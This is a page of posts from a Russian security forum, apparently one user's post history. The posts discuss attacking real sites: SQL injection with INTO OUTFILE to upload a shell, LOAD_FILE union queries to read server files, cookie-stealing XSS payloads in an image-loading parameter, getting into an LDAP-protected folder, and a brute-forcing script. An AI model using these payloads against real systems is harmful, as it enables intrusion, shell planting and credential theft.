Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Выбрать дату в календареВыбрать дату в календаре

Страницы: 1 2 3 4 5 След.
Помогите с выбором CMS!
 
wordpress
Снять Cookies
 
Читай статьи об XSS
SQl инъекция, Залить шелл через SQL инъекцию!
 
Цитата
f_s_b_37 пишет:
какая связь между зеркалированием спецсимволов и привилегией мускуля file_priv ? 0о
вот именно в чем связь? =) Я вообще-то про особенности INTO OUTFILE говорил, а именно хотел сказать то, что значение необходимо передавать только в кавычках.
SQl инъекция, Залить шелл через SQL инъекцию!
 
Цитата
Используй хекс кодировку строки /home/www3/mysite.ru/shellka.php,
т.е. попробуй так into+outfile+0x2F686F6D652F777777332F6D79736974652E72752F736­8656C6C6B612E706870/*
Если стоит magic_quotes_gpc, то INTO OUTFILE реализовать в любом случае не удастся, даже с помощью представления строки в виде hex
чем расшифровать хэш, plz
Технологии 3Dинтернета – что выбрать?, Какая технология сейчас применяется для создания 3D сцен?
 
Ты здесь упомянул VRML. Да, хорошая вещь была =) Самый простой способ создать 3D-мир имхо. Однако данный стандарт как-то был популярен (кажется в 1997), а потом загнулся... сейчас им занимаются лишь в образовательныйх целях. Посмотри здесь, может быть найдешь что-нибудь для себя: http://vrmlworld.net/
LDAP Server
 
На сайте есть папка /restricted/, защищенная basic-авторизацией. Просмотрев .htaccess, получил следующее:
Цитата

AuthName "LDAP Login"
AuthType basic
LDAP_Server 127.0.0.1
LDAP_Port 389
Base_DN dc=***,dc=***
Bind_DN "cn=proxyuser,dc=***,dc=***"
Bind_Pass "тут_пароль_в_plain_тексте"
UID_Attr uid
Group_Attr "memberUid"
#require group cn=Staff,ou=Group cn=Faculty,ou=Group
require valid-user
#LDAP_Debug On
Вопрос: каким способом можно успешно авторизироваться и что за LDAP Server такой?
Сайт Очень Известного Банка России, не шарю
 
Цитата
да те времена уже прошли чтоб в /etc/passwd пароли хранили
ага, прошли =) наш провайдер хранит пароли юзеров от их домашних страничек прямо в /etc/passwd =) А вы говорите: нет сынок это фантастика - куда там, все продолжается =)
Необычная уязвимость, подгрузка произвольных картинок
 
да, парни, кроме XSS ничего выжать больше не удалось... Насколько я понял скрипт не обрабатывает содержимое картинки, а грузит ее напрямую...
Цитата
Shanker пишет:
В Хакере пару раз писалось... Не помню какие номера... Там через ACDSee прям и писалась html-строка вроде...
а я помню =) в журнале за июль 2006 про взлом ege.edu.ru писали... там случай очень похож на мой и выполнялся не html, а php код...
Цитата
[53x]Shadow пишет:
должно работать даже такwww.site.ru/image.php?image='><script>alert(document.cookie)</script>
верно, так тоже работает, только вот и здесь облом: скрипт фильтрует знак = :(
Необычная уязвимость, подгрузка произвольных картинок
 
Нашел PHP-скрипт на сайте, реализующий показ изображений. Уязвимость заключается в том, что я могу подключать произвольные картинки. Например:
www.site.ru/image.php?image=http://mysite.ru/bb.jpg
Проблема в том, что я не знаю как правильно это использовать...хотя кое-что уже получилось, а именно XSS
www.site.ru/image.php?image=http://mysite.ru/bb.jpg'><script>alert(document.cookie)</script>
Я слышал, что можно внедрять произвольный код в поле EXIF jpg-картинок, если у кого есть инфа по этому поводу, то пожалуйста поделитесь!
Phpbb 2.0.13
 
Цитата
slade slader пишет:
Форум курил!
плохо курил однако...
Поскажите
 
Цитата
Larbes Zicca пишет:
протаколам MySQL , PHP или ещё чёнить...
сам хоть понял, что написал?
sql-inj на islam.ru
 
Цитата
logos пишет:
Лучше просто сообщи админу о багах.
правильно! уверен fowl как раз это и сделает
;)
Хак
 
Мдя...довольно интересный баг...
Многопоточность в PHP
 
Вот промежуточная версия скрипта - http://razor-alex.narod.ru/sqlbruter-0.2.zip
Он вполне рабочий: с небольшими словарями до 1000 слов можно с успехом его использовать. В следующих версиях буду работать над повышением скорости брута...
Многопоточность в PHP
 
Цитата
Serg пишет:
Главный скрипт принимает параметры, делит диапазон для перебора на н частей, запускает н копий перебирающих скриптов, передав каждому свой диапазон.
Serg, интересная идея. Кстати, это намного проще реализовать чем мучаться с потоками...
InvisionPB
 
Может и есть, однако если бы он появился в паблике, то об этом знали бы все...
/var/db/locate.database, Как его прочитать с помощью SQL inj?
 
Присутствует SQL инъекция, могу читать произвольные файлы на сервере с помощью LOAD_FILE, хочу получить файл locate.database, в котором хранится структура файлов, однако у меня возникает проблема: при запросе http://www.host.ru/script.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,LOAD_FILE('/var/db/locate.database')/* получаю абсолютно нечитабельное содержание этого файла. По первым строкам можно понять, что это gzip-архив: gz.g.33..h.pt.e.ins.erstr.entef.rele1.. При попытке сохранения как файл locate.tar.gz, получившийся архив не читается. Что делать?
Что за хэш такой?
 
www.passcrack.spb.ru - расшифровка SHA-1 хешей и не только...
Помгите со взломом
 
Цитата
crazy nix* пишет:
сдесь обсуждаются уязвимости... но никак не темы типа "взломайта сайт потому что админ меня обидил" ... в конце концов это секлаб... будьте серьезнее
верно. В конце концов, ломать бесплатно никто не будет.
Страницы: 1 2 3 4 5 След.